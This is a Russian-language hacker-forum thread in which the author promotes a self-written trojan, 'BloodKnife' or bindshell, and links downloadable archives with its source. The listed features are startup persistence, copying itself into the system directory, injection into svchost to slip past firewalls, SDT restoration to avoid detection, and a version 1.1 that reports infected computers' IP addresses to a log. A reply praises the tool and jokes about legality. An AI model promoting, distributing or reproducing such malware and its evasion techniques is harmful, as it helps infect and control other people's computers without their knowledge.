Вам мой BloodKnife не понравился...

Когда то выкладывал в кодинге. Но сейчас добавил SDT restore , чтоб инжект не палился.

+Запись в автозагрузку, копи в системную диру
+ижект в svchost(svchost`у разрешён доступ в инет - фаеры молчат)
+SDT restore(инжект не палится)
+Вес 11,5 кб(если убрать SDT, то 5кб.)
+с исходниками

http://lordofring.tushino.com/virus.rar

[update]
Версия 1.1
+Добавлен отстук по стату. IP заражённых компов
пишется в лог.

http://lordofring.tushino.com/bindshellv.1.1.rar - c исходниками

Кто сказал что твой трой не понравился? Очень хороший пример. Ясен пепь профессионально не используешь, но ты старался, да и сорцы очень интересны.
Выкладывай побольше. Я буду учиться=) Да и многим пригодиться! Ведь мы не будем использовать эти примеры для программирования в целях,
противоречащих УК РФ, правда?

Версия 1.1
+Добавлен отстук по стату. IP заражённых компов пишется в лог.

http://lordofring.tushino.com/bindshellv.1.1.rar - c исходниками